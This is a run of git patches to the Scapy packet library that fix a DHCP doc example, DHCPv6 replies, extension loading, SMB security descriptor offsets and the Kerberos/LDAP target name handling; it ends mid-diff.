get_if_raw_hwaddr to get_if_hwaddr (#4802) I assume there was an update somewhere along the lines and the documentation here wasn't updated to reflect the new function name/functionality --- doc/scapy/usage.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 4cf9f4ec54b..1202d9cc400 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1681,7 +1681,7 @@ Solution Use Scapy to send a DHCP discover request and analyze the replies:: >>> conf.checkIPaddr = False - >>> fam,hw = get_if_raw_hwaddr(conf.iface) + >>> hw = get_if_hwaddr(conf.iface) >>> dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"]) >>> ans, unans = srp(dhcp_discover, multi=True) # Press CTRL-C after several seconds Begin emission: From 340d99dc3b860cd67d54ceb49718e04e8f6bb4eb Mon Sep 17 00:00:00 2001 From: John Hooker <109040779+JDHooker@users.noreply.github.com> Date: Tue, 29 Jul 2025 21:18:58 -0400 Subject: [PATCH 1520/1632] tls: fix doc name of a class (#4804) --- scapy/layers/tls/extensions.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/tls/extensions.py b/scapy/layers/tls/extensions.py index e52e5a0d024..552e6d86a1c 100644 --- a/scapy/layers/tls/extensions.py +++ b/scapy/layers/tls/extensions.py @@ -576,7 +576,7 @@ class TLS_Ext_EarlyDataIndication(TLS_Ext_Unknown): class TLS_Ext_EarlyDataIndicationTicket(TLS_Ext_Unknown): - name = "TLS Extension - Ticket Early Data Info" + name = "TLS Extension - Early Data Indication Ticket" fields_desc = [ShortEnumField("type", 0x2a, _tls_ext), MayEnd(ShortField("len", None)), IntField("max_early_data_size", 0)] From 5744d95c3e380b08cceaa47296540e1ede21612c Mon Sep 17 00:00:00 2001 From: Abhishek Pandey <87481264+AbhishekPandey1998@users.noreply.github.com> Date: Wed, 30 Jul 2025 06:49:34 +0530 Subject: [PATCH 1521/1632] Fix: DHCPv6_am returns Reply instead of Solicit for DHCP6_Request (#4799) * Fix: DHCPv6_am returns Reply instead of Solicit for DHCP6_Request * Fix assert DHCP6_Solicit CI failure --- scapy/layers/dhcp6.py | 2 +- test/answering_machines.uts | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 84737991dff..ca24bb17b25 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -1875,7 +1875,7 @@ def _include_options(query, answer): client_duid = p[DHCP6OptClientId].duid resp = IPv6(src=self.src_addr, dst=req_src) resp /= UDP(sport=547, dport=546) - resp /= DHCP6_Solicit(trid=trid) + resp /= DHCP6_Reply(trid=trid) resp /= DHCP6OptServerId(duid=self.duid) resp /= DHCP6OptClientId(duid=client_duid) diff --git a/test/answering_machines.uts b/test/answering_machines.uts index f81f4fbbe0d..bee850405cb 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -232,7 +232,7 @@ assert a.is_request(req) res = a.make_reply(req) assert not a.is_request(res) assert res[UDP].dport == 546 -assert res[DHCP6_Solicit] +assert res[DHCP6_Reply] a.print_reply(req, res) = WiFi_am From 57390355713d34e6e426efdcf53d9b51ee97e74f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 30 Jul 2025 03:42:28 +0200 Subject: [PATCH 1522/1632] Improve AutoArgparse & rework extensions (#4806) * Improve AutoArgparse logic * Rework extensions loading * Update scapy/config.py Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com> --- scapy/config.py | 157 +++++++++++++++++++++++++----------------------- scapy/main.py | 74 +++++++++++++++++++++-- scapy/utils.py | 40 +++++++++--- 3 files changed, 184 insertions(+), 87 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index 1a70b7cf440..6c10d791684 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -7,11 +7,11 @@ Implementation of the configuration object. """ - import atexit import copy import functools import os +import pathlib import re import socket import sys @@ -538,7 +538,7 @@ def __repr__(self): class ScapyExt: - __slots__ = ["specs", "name", "version"] + __slots__ = ["specs", "name", "version", "bash_completions"] class MODE(Enum): LAYERS = "layers" @@ -554,6 +554,7 @@ class ScapyExtSpec: def __init__(self): self.specs: Dict[str, 'ScapyExt.ScapyExtSpec'] = {} + self.bash_completions = {} def config(self, name, version): self.name = name @@ -576,6 +577,9 @@ def register(self, name, mode, path, default=None): spec.default = bool(importlib.util.find_spec(spec.fullname)) self.specs[fullname] = spec + def register_bashcompletion(self, script: pathlib.Path): + self.bash_completions[script.name] = script + def __repr__(self): return "" % ( self.name, @@ -585,18 +589,19 @@ def __repr__(self): class ExtsManager(importlib.abc.MetaPathFinder): - __slots__ = ["exts", "_loaded", "all_specs"] + __slots__ = ["exts", "all_specs"] - SCAPY_PLUGIN_CLASSIFIER = 'Framework :: Scapy' - GPLV2_CLASSIFIERS = [ - 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)', - 'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)', + GPLV2_LICENCES = [ + "GPL-2.0-only", + "GPL-2.0-or-later", ] def __init__(self): self.exts: List[ScapyExt] = [] self.all_specs: Dict[str, ScapyExt.ScapyExtSpec] = {} - self._loaded = [] + # Add to meta_path as we are an import provider + if self not in sys.meta_path: + sys.meta_path.append(self) def find_spec(self, fullname, path, target=None): if fullname in self.all_specs: @@ -606,7 +611,10 @@ def invalidate_caches(self): pass def _register_spec(self, spec): + # Register to known specs self.all_specs[spec.fullname] = spec + + # If default=True, inject it in the currently loaded modules if spec.default: loader = importlib.util.LazyLoader(spec.spec.loader) spec.spec.loader = loader @@ -614,73 +622,76 @@ def _register_spec(self, spec): sys.modules[spec.fullname] = module loader.exec_module(module) - def load(self): + def load(self, extension: str): + """ + Load a scapy extension. + + :param extension: the name of the extension, as installed. + """ try: import importlib.metadata except ImportError: + raise ImportError("Cannot import importlib.metadata ! Upgrade Python.") + + # Get extension distribution + distr = importlib.metadata.distribution(extension) + + # Check the classifiers + if distr.metadata.get('License-Expression', None) not in self.GPLV2_LICENCES: + log_loading.warning( + "'%s' has no GPLv2 classifier therefore cannot be loaded." % extension + ) return - for distr in importlib.metadata.distributions(): - if any( - v == self.SCAPY_PLUGIN_CLASSIFIER - for k, v in distr.metadata.items() if k == 'Classifier' - ): - try: - # Python 3.13 raises an internal warning when calling this - with warnings.catch_warnings(): - warnings.filterwarnings("ignore", category=DeprecationWarning) - pkg = next( - k - for k, v in - importlib.metadata.packages_distributions().items() - if distr.name in v - ) - except KeyError: - pkg = distr.name - if pkg in self._loaded: - continue - if not any( - v in self.GPLV2_CLASSIFIERS - for k, v in distr.metadata.items() if k == 'Classifier' - ): - log_loading.warning( - "'%s' has no GPLv2 classifier therefore cannot be loaded." % pkg # noqa: E501 - ) - continue - self._loaded.append(pkg) - ext = ScapyExt() - try: - scapy_ext = importlib.import_module(pkg) - except Exception as ex: - log_loading.warning( - "'%s' failed during import with %s" % ( - pkg, - ex - ) - ) - continue - try: - scapy_ext_func = scapy_ext.scapy_ext - except AttributeError: - log_loading.info( - "'%s' included the Scapy Framework specifier " - "but did not include a scapy_ext" % pkg - ) - continue - try: - scapy_ext_func(ext) - except Exception as ex: - log_loading.warning( - "'%s' failed during initialization with %s" % ( - pkg, - ex - ) + + # Create the extension + ext = ScapyExt() + + # Get the top-level declared "import packages" + # HACK: not available nicely in importlib :/ + packages = distr.read_text("top_level.txt").split() + + for package in packages: + scapy_ext = importlib.import_module(package) + + # We initialize the plugin by calling it's 'scapy_ext' function + try: + scapy_ext_func = scapy_ext.scapy_ext + except AttributeError: + log_loading.warning( + "'%s' does not look like a Scapy plugin !" % extension + ) + return + try: + scapy_ext_func(ext) + except Exception as ex: + log_loading.warning( + "'%s' failed during initialization with %s" % ( + extension, + ex ) - continue - for spec in ext.specs.values(): - self._register_spec(spec) - self.exts.append(ext) - if self not in sys.meta_path: - sys.meta_path.append(self) + ) + return + + # Register all the specs provided by this extension + for spec in ext.specs.values(): + self._register_spec(spec) + + # Add to the extension list + self.exts.append(ext) + + # If there are bash autocompletions, add them + if ext.bash_completions: + from scapy.main import _add_bash_autocompletion + + for name, script in ext.bash_completions.items(): + _add_bash_autocompletion(name, script) + + def loadall(self) -> None: + """ + Load all extensions registered in conf. + """ + for extension in conf.load_extensions: + self.load(extension) def __repr__(self): from scapy.utils import pretty_list @@ -1033,6 +1044,8 @@ class Conf(ConfClass): #: netcache holds time-based caches for net operations netcache: NetCache = NetCache() geoip_city = None + #: Scapy extensions that are loaded automatically on load + load_extensions: List[str] = [] # can, tls, http and a few others are not loaded by default load_layers: List[str] = [ 'bluetooth', @@ -1170,10 +1183,6 @@ def __getattribute__(self, attr): conf = Conf() # type: Conf -# Python 3.8 Only -if sys.version_info >= (3, 8): - conf.exts.load() - def crypto_validator(func): # type: (DecoratorCallable) -> DecoratorCallable diff --git a/scapy/main.py b/scapy/main.py index fea7f1ec302..663d5308b8c 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -9,20 +9,22 @@ import builtins -import pathlib -import sys -import os -import getopt import code -import gzip +import getopt import glob +import gzip import importlib import io -from itertools import zip_longest import logging +import os +import pathlib import pickle +import shutil +import sys import types import warnings + +from itertools import zip_longest from random import choice # Never add any global import, in main.py, that would trigger a @@ -101,6 +103,15 @@ def _probe_cache_folder(*cf): ) +def _probe_share_folder(*cf): + # type: (str) -> Optional[pathlib.Path] + return _probe_xdg_folder( + "XDG_DATA_HOME", + os.path.join(os.path.expanduser("~"), ".local", "share"), + *cf + ) + + def _check_perms(file: Union[pathlib.Path, str]) -> None: """ Checks that the permissions of a file are properly user-specific, if sudo is used. @@ -203,6 +214,22 @@ def _validate_local(k): DEFAULT_PRESTART_FILE = None DEFAULT_STARTUP_FILE = None +# https://github.com/scop/bash-completion/blob/main/README.md#faq +if "BASH_COMPLETION_USER_DIR" in os.environ: + BASH_COMPLETION_USER_DIR: Optional[pathlib.Path] = pathlib.Path( + os.environ["BASH_COMPLETION_USER_DIR"] + ) +else: + BASH_COMPLETION_USER_DIR = _probe_share_folder("bash-completion") + +if BASH_COMPLETION_USER_DIR: + BASH_COMPLETION_FOLDER: Optional[pathlib.Path] = ( + BASH_COMPLETION_USER_DIR / "completions" + ) +else: + BASH_COMPLETION_FOLDER = None + + # Default scapy prestart.py config file DEFAULT_PRESTART = """ @@ -219,6 +246,12 @@ def _validate_local(k): # disable INFO: tags related to dependencies missing # log_loading.setLevel(logging.WARNING) +# extensions to load by default +conf.load_extensions = [ + # "scapy-red", + # "scapy-rpc", +] + # force-use libpcap # conf.use_pcap = True """.strip() @@ -237,6 +270,31 @@ def _usage(): sys.exit(0) +def _add_bash_autocompletion(fname: str, script: pathlib.Path) -> None: + """ + Util function used most notably in setup.py to add a bash autocompletion script. + """ + try: + if BASH_COMPLETION_FOLDER is None: + raise OSError() + + # If already defined, exit. + dest = BASH_COMPLETION_FOLDER / fname + if dest.exists(): + return + + # Check that bash autocompletion folder exists + if not BASH_COMPLETION_FOLDER.exists(): + BASH_COMPLETION_FOLDER.mkdir(parents=True, exist_ok=True) + _check_perms(BASH_COMPLETION_FOLDER) + + # Copy file + shutil.copy(script, BASH_COMPLETION_FOLDER) + except OSError: + log_loading.warning("Bash autocompletion script could not be copied.", + exc_info=True) + + ###################### # Extension system # ###################### @@ -808,6 +866,10 @@ def interact(mydict=None, _locals=SESSION ) + # Load extensions (Python 3.8 Only) + if sys.version_info >= (3, 8): + conf.exts.loadall() + if conf.fancy_banner: banner_text = get_fancy_banner() else: diff --git a/scapy/utils.py b/scapy/utils.py index 0c93f630dc6..2a381dac9d8 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -3895,7 +3895,10 @@ def loop(self, debug: int = 0) -> None: print("Output processor failed with error: %s" % ex) -def AutoArgparse(func: DecoratorCallable) -> None: +def AutoArgparse( + func: DecoratorCallable, + _parseonly: bool = False, +) -> Optional[Tuple[List[str], List[str]]]: """ Generate an Argparse call from a function, then call this function. @@ -3933,17 +3936,15 @@ def AutoArgparse(func: DecoratorCallable) -> None: argsdoc[argparam] = argdesc else: desc = "" - # Now build the argparse.ArgumentParser - parser = argparse.ArgumentParser( - prog=func.__name__, - description=desc, - formatter_class=argparse.ArgumentDefaultsHelpFormatter, - ) + # Process the parameters positional = [] + noargument = [] + parameters = {} for param in inspect.signature(func).parameters.values(): if not param.annotation: continue + noarg = False parname = param.name paramkwargs = {} if param.annotation is bool: @@ -3952,6 +3953,7 @@ def AutoArgparse(func: DecoratorCallable) -> None: paramkwargs["action"] = "store_false" else: paramkwargs["action"] = "store_true" + noarg = True elif param.annotation in [str, int, float]: paramkwargs["type"] = param.annotation else: @@ -3969,9 +3971,32 @@ def AutoArgparse(func: DecoratorCallable) -> None: paramkwargs["action"] = "append" if param.name in argsdoc: paramkwargs["help"] = argsdoc[param.name] + # Add to the parameter list + parameters[parname] = paramkwargs + if noarg: + noargument.append(parname) + + if _parseonly: + # An internal mode used to generate bash autocompletion, do it then exit. + return ( + [x for x in parameters if x not in positional] + ["--help"], + [x for x in noargument if x not in positional] + ["--help"], + ) + + # Now build the argparse.ArgumentParser + parser = argparse.ArgumentParser( + prog=func.__name__, + description=desc, + formatter_class=argparse.ArgumentDefaultsHelpFormatter, + ) + + # Add parameters to parser + for parname, paramkwargs in parameters.items(): parser.add_argument(parname, **paramkwargs) # type: ignore + # Now parse the sys.argv parameters params = vars(parser.parse_args()) + # Act as in interactive mode conf.logLevel = 20 from scapy.themes import DefaultTheme @@ -3988,6 +4013,7 @@ def AutoArgparse(func: DecoratorCallable) -> None: except AssertionError as ex: print("ERROR: " + str(ex)) parser.print_help() + return None ####################### From 1e7a629a7dc45b7207649d55fd051084e2b4a449 Mon Sep 17 00:00:00 2001 From: Louis Scalbert <47607835+louis-6wind@users.noreply.github.com> Date: Wed, 30 Jul 2025 03:57:02 +0200 Subject: [PATCH 1523/1632] AsyncSniffer: forward error in stop() if never started (#4800) * Fix AsyncSniffer Attribute Error Signed-off-by: Louis Scalbert * Forward error + test --------- Signed-off-by: Louis Scalbert Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/sendrecv.py | 5 +++++ test/regression.uts | 9 +++++++++ 2 files changed, 14 insertions(+) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 7f597b4495e..94ab1ae30f8 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1401,6 +1401,11 @@ def stop(self, join=True): """Stops AsyncSniffer if not in async mode""" if self.running: self.stop_cb() + if not hasattr(self, "continue_sniff"): + # Never started -> is there an exception? + if self.exception is not None: + raise self.exception + return None if self.continue_sniff: raise Scapy_Exception( "Unsupported (offline or unsupported socket)" diff --git a/test/regression.uts b/test/regression.uts index 6ff43dae945..fd0fa61352c 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1787,6 +1787,15 @@ try: except ValueError: assert True +try: + sniffer = AsyncSniffer(iface="this_interface_does_not_exists") + sniffer.start() + sniffer.thread.join() + sniffer.stop() + assert False, "Should have errored by now" +except ValueError: + assert True + = Sending a TCP syn 'forever' at layer 2 and layer 3 ~ netaccess needs_root IP def _test(): From be3e1aee2a99e57ec4e1322c62cde1c3f72f64bc Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 30 Jul 2025 04:37:53 +0200 Subject: [PATCH 1524/1632] Fix conf.exts.load() on Python 3.8 (#4808) --- scapy/config.py | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index 6c10d791684..d302b257840 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -631,10 +631,18 @@ def load(self, extension: str): try: import importlib.metadata except ImportError: - raise ImportError("Cannot import importlib.metadata ! Upgrade Python.") + log_loading.warning( + "'%s' not loaded. " + "Scapy extensions require at least Python 3.8+ !" % extension + ) + return # Get extension distribution - distr = importlib.metadata.distribution(extension) + try: + distr = importlib.metadata.distribution(extension) + except importlib.metadata.PackageNotFoundError: + log_loading.warning("The extension '%s' was not found !" % extension) + return # Check the classifiers if distr.metadata.get('License-Expression', None) not in self.GPLV2_LICENCES: From 58526ece862d099f3dbcb73202eb6eb5b7502b89 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 31 Jul 2025 00:48:18 +0200 Subject: [PATCH 1525/1632] Fix SECURITY_DESCRIPTOR computation (#4809) --- scapy/layers/smb2.py | 32 ++++++++++++++++++++++++++------ scapy/modules/ldaphero.py | 6 ++++++ test/scapy/layers/smb2.uts | 26 ++++++++++++++++++++++++++ 3 files changed, 58 insertions(+), 6 deletions(-) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 037d340b2cd..7a6e2be44ed 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -1550,21 +1550,21 @@ class SECURITY_DESCRIPTOR(_NTLMPayloadPacket): "SELF_RELATIVE", ], ), - LEIntField("OwnerSidOffset", 0), - LEIntField("GroupSidOffset", 0), - LEIntField("SACLOffset", 0), - LEIntField("DACLOffset", 0), + LEIntField("OwnerSidOffset", None), + LEIntField("GroupSidOffset", None), + LEIntField("SACLOffset", None), + LEIntField("DACLOffset", None), _NTLMPayloadField( "Data", OFFSET, [ ConditionalField( PacketField("OwnerSid", WINNT_SID(), WINNT_SID), - lambda pkt: pkt.OwnerSidOffset, + lambda pkt: pkt.OwnerSidOffset != 0, ), ConditionalField( PacketField("GroupSid", WINNT_SID(), WINNT_SID), - lambda pkt: pkt.GroupSidOffset, + lambda pkt: pkt.GroupSidOffset != 0, ), ConditionalField( PacketField("SACL", WINNT_ACL(), WINNT_ACL), @@ -1579,6 +1579,26 @@ class SECURITY_DESCRIPTOR(_NTLMPayloadPacket): ), ] + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return ( + _NTLM_post_build( + self, + pkt, + self.OFFSET, + { + "OwnerSid": 4, + "GroupSid": 8, + "SACL": 12, + "DACL": 16, + }, + config=[ + ("Offset", _NTLM_ENUM.OFFSET), + ] + ) + + pay + ) + # [MS-FSCC] 2.4.2 FileAllInformation diff --git a/scapy/modules/ldaphero.py b/scapy/modules/ldaphero.py index 2c162be7ce2..649673a5c12 100644 --- a/scapy/modules/ldaphero.py +++ b/scapy/modules/ldaphero.py @@ -1191,6 +1191,12 @@ def edit(*_): control |= v nTSecurityDescriptor.Control = control + # Offsets need to be recalculated + nTSecurityDescriptor.OwnerSidOffset = None + nTSecurityDescriptor.GroupSidOffset = None + nTSecurityDescriptor.DACLOffset = None + nTSecurityDescriptor.SACLOffset = None + # Pfew, we did it. That was some big UI. # Now update the SD. diff --git a/test/scapy/layers/smb2.uts b/test/scapy/layers/smb2.uts index 5ecb92a9904..a6081c4fe5d 100644 --- a/test/scapy/layers/smb2.uts +++ b/test/scapy/layers/smb2.uts @@ -549,3 +549,29 @@ assert isinstance(set_info.Data, FileRenameInformation) assert set_info.Data.FileName == "test" assert not set_info.Data.ReplaceIfExists += SMB2 - Build and dissect SECURITY_DESCRIPTOR + +sd = SECURITY_DESCRIPTOR( + Control="DACL_PRESENT+DACL_PROTECTED+SELF_RELATIVE", + OwnerSid=WINNT_SID.fromstr("S-1-1-0"), + GroupSid=WINNT_SID.fromstr("S-1-1-0"), + DACL=WINNT_ACL( + Aces=[ + WINNT_ACE_HEADER() / WINNT_ACCESS_ALLOWED_ACE( + Mask=1, + Sid=WINNT_SID.fromstr("S-1-1-0"), + ) + ] + ) +) + +sd = SECURITY_DESCRIPTOR(bytes(sd)) + +assert sd.OwnerSidOffset == 20 +assert sd.GroupSidOffset == 32 +assert sd.SACLOffset == 0 +assert sd.DACLOffset == 44 + +assert sd.OwnerSid.summary() == "S-1-1-0" +assert sd.GroupSid.summary() == "S-1-1-0" +assert sd.DACL.toSDDL() == ['(A;;;;;S-1-1-0)'] From cc8e09187407cefce61207823239c2d5749bf046 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 31 Jul 2025 03:55:40 +0200 Subject: [PATCH 1526/1632] SPNEGO: add new from_cli_arguments function, improvements (#4805) * SPNEGO: add new from_cli_arguments function, improvements * AutoArgparse: support bytes, better naming * Add target_name for KerberosSSP * PEP8 fixes --- doc/scapy/layers/smb.rst | 3 +- scapy/config.py | 5 ++ scapy/layers/gssapi.py | 1 + scapy/layers/http.py | 1 + scapy/layers/kerberos.py | 18 +++-- scapy/layers/ldap.py | 16 ++-- scapy/layers/msrpce/msnrpc.py | 7 +- scapy/layers/msrpce/rpcclient.py | 11 ++- scapy/layers/ntlm.py | 1 + scapy/layers/smb2.py | 2 +- scapy/layers/smbclient.py | 107 ++++++++----------------- scapy/layers/spnego.py | 130 +++++++++++++++++++++++++++++-- scapy/libs/rfc3961.py | 6 +- scapy/utils.py | 34 +++++++- 14 files changed, 238 insertions(+), 104 deletions(-) diff --git a/doc/scapy/layers/smb.rst b/doc/scapy/layers/smb.rst index 20482142246..6b86d80f8ff 100644 --- a/doc/scapy/layers/smb.rst +++ b/doc/scapy/layers/smb.rst @@ -76,7 +76,7 @@ You might be wondering if you can pass the ``HashNT`` of the password of the use .. code:: python - >>> smbclient("server1.domain.local", ssp=KerberosSSP(SPN="cifs/server1", UPN="Administrator@domain.local", PASSWORD="password")) + >>> smbclient("server1.domain.local", ssp=KerberosSSP(UPN="Administrator@domain.local", PASSWORD="password")) **smbclient using a** :class:`~scapy.layers.ntlm.KerberosSSP` **created by** `Ticketer++ `_: @@ -155,7 +155,6 @@ Let's write a script that connects to a share and list the files in the root fol KerberosSSP( UPN="Administrator@domain.local", PASSWORD=password, - SPN="cifs/server1", ) ]) # Connect to the server diff --git a/scapy/config.py b/scapy/config.py index d302b257840..2a385c2f579 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -599,6 +599,7 @@ class ExtsManager(importlib.abc.MetaPathFinder): def __init__(self): self.exts: List[ScapyExt] = [] self.all_specs: Dict[str, ScapyExt.ScapyExtSpec] = {} + self._loaded: List[str] = [] # Add to meta_path as we are an import provider if self not in sys.meta_path: sys.meta_path.append(self) @@ -628,6 +629,9 @@ def load(self, extension: str): :param extension: the name of the extension, as installed. """ + if extension in self._loaded: + return + try: import importlib.metadata except ImportError: @@ -686,6 +690,7 @@ def load(self, extension: str): # Add to the extension list self.exts.append(ext) + self._loaded.append(extension) # If there are bash autocompletions, add them if ext.bash_completions: diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index f1743770eef..547e09a4734 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -455,6 +455,7 @@ def GSS_Init_sec_context( self, Context: CONTEXT, token=None, + target_name: Optional[str] = None, req_flags: Optional[GSS_C_FLAGS] = None, chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, ): diff --git a/scapy/layers/http.py b/scapy/layers/http.py index fede3e60594..016337738fc 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -942,6 +942,7 @@ def request( self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, ssp_blob, + target_name="http/" + host, req_flags=0, chan_bindings=self.chan_bindings, ) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 9e292dcf7e2..39e734fe724 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -143,6 +143,12 @@ from scapy.layers.smb2 import STATUS_ERREF from scapy.layers.x509 import X509_AlgorithmIdentifier +# Redirect exports from RFC3961 +try: + from scapy.libs.rfc3961 import * # noqa: F401,F403 +except ImportError: + pass + # Typing imports from typing import ( Optional, @@ -4008,7 +4014,8 @@ class KerberosSSP(SSP): :param ST: the service ticket to use for access. If not provided, will be retrieved - :param SPN: the SPN of the service to use + :param SPN: the SPN of the service to use. If not provided, will use the + target_name provided in the GSS_Init_sec_context :param UPN: The client UPN :param DC_IP: (optional) is ST+KEY are not provided, will need to contact the KDC at this IP. If not provided, will perform dc locator. @@ -4506,6 +4513,7 @@ def GSS_Init_sec_context( self, Context: CONTEXT, token=None, + target_name: Optional[str] = None, req_flags: Optional[GSS_C_FLAGS] = None, chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, ): @@ -4536,8 +4544,8 @@ def GSS_Init_sec_context( # Do we have a ST? if self.ST is None: # Client sends an AP-req - if not self.SPN: - raise ValueError("Missing SPN attribute") + if not self.SPN and not target_name: + raise ValueError("Missing SPN/target_name attribute") additional_tickets = [] if self.U2U: try: @@ -4559,7 +4567,7 @@ def GSS_Init_sec_context( # Use TGT res = krb_tgs_req( upn=self.UPN, - spn=self.SPN, + spn=self.SPN or target_name, ip=self.DC_IP, sessionkey=self.KEY, ticket=self.TGT, @@ -4571,7 +4579,7 @@ def GSS_Init_sec_context( # Ask for TGT then ST res = krb_as_and_tgs( upn=self.UPN, - spn=self.SPN, + spn=self.SPN or target_name, ip=self.DC_IP, key=self.KEY, password=self.PASSWORD, diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index ee358de34c4..c09e07e64c1 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -1800,6 +1800,7 @@ def __init__( verb=True, ): self.sock = None + self.host = None self.verb = verb self.ssl = False self.sslcontext = None @@ -1815,7 +1816,7 @@ def __init__( def connect( self, - ip, + host, port=None, use_ssl=False, sslcontext=None, @@ -1826,7 +1827,7 @@ def connect( """ Initiate a connection - :param ip: the IP or hostname to connect to. + :param host: the IP or hostname to connect to. :param port: the port to connect to. (Default: 389 or 636) :param use_ssl: whether to use LDAPS or not. (Default: False) @@ -1844,17 +1845,18 @@ def connect( port = 389 sock = socket.socket() self.timeout = timeout + self.host = host sock.settimeout(timeout) if self.verb: print( "\u2503 Connecting to %s on port %s%s..." % ( - ip, + host, port, " with SSL" if self.ssl else "", ) ) - sock.connect((ip, port)) + sock.connect((host, port)) if self.verb: print( conf.color_theme.green( @@ -1872,7 +1874,7 @@ def connect( context = ssl.create_default_context() else: context = self.sslcontext - sock = context.wrap_socket(sock, server_hostname=sni or ip) + sock = context.wrap_socket(sock, server_hostname=sni or host) # Wrap the socket in a Scapy socket if self.ssl: self.sock = SSLStreamSocket(sock, LDAP) @@ -2042,6 +2044,7 @@ def bind( # 2. First exchange: Negotiate self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, + target_name="ldap/" + self.host, req_flags=( GSS_C_FLAGS.GSS_C_REPLAY_FLAG | GSS_C_FLAGS.GSS_C_SEQUENCE_FLAG @@ -2068,6 +2071,7 @@ def bind( self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, GSSAPI_BLOB(val), + target_name="ldap/" + self.host, chan_bindings=self.chan_bindings, ) resp = self.sr1( @@ -2090,6 +2094,7 @@ def bind( # GSSAPI or SPNEGO self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, + target_name="ldap/" + self.host, req_flags=( # Required flags for GSSAPI: RFC4752 sect 3.1 GSS_C_FLAGS.GSS_C_REPLAY_FLAG @@ -2122,6 +2127,7 @@ def bind( self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, GSSAPI_BLOB(val), + target_name="ldap/" + self.host, chan_bindings=self.chan_bindings, ) else: diff --git a/scapy/layers/msrpce/msnrpc.py b/scapy/layers/msrpce/msnrpc.py index a07cb42aa9b..fef1007e562 100644 --- a/scapy/layers/msrpce/msnrpc.py +++ b/scapy/layers/msrpce/msnrpc.py @@ -475,7 +475,12 @@ def GSS_VerifyMICEx(self, Context, msgs, signature): self._unsecure(Context, msgs, signature, False) def GSS_Init_sec_context( - self, Context, token=None, req_flags: Optional[GSS_C_FLAGS] = None + self, + Context: CONTEXT, + token=None, + target_name: Optional[str] = None, + req_flags: Optional[GSS_C_FLAGS] = None, + chan_bindings: bytes = GSS_C_NO_CHANNEL_BINDINGS, ): if Context is None: Context = self.CONTEXT(True, req_flags=req_flags, AES=self.AES) diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index 0d3dec573dd..6e81221dfec 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -76,6 +76,7 @@ def __init__(self, transport, ndr64=False, ndrendian="little", verb=True, **kwar self.ndr64 = ndr64 self.ndrendian = ndrendian self.verb = verb + self.host = None self.auth_level = kwargs.pop("auth_level", DCE_C_AUTHN_LEVEL.NONE) self.auth_context_id = kwargs.pop("auth_context_id", 0) self.ssp = kwargs.pop("ssp", None) # type: SSP @@ -100,7 +101,7 @@ def from_smblink(cls, smbcli, smb_kwargs={}, **kwargs): ) return client - def connect(self, ip, port=None, timeout=5, smb_kwargs={}): + def connect(self, host, port=None, timeout=5, smb_kwargs={}): """ Initiate a connection """ @@ -113,14 +114,15 @@ def connect(self, ip, port=None, timeout=5, smb_kwargs={}): raise ValueError( "Can't guess the port for transport: %s" % self.transport ) + self.host = host sock = socket.socket() sock.settimeout(timeout) if self.verb: print( "\u2503 Connecting to %s on port %s via %s..." - % (ip, port, repr(self.transport)) + % (host, port, repr(self.transport)) ) - sock.connect((ip, port)) + sock.connect((host, port)) if self.verb: print( conf.color_theme.green( @@ -313,6 +315,7 @@ def _bind(self, interface, reqcls, respcls): else 0 ) ), + target_name="host/" + self.host, ) if status not in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: # 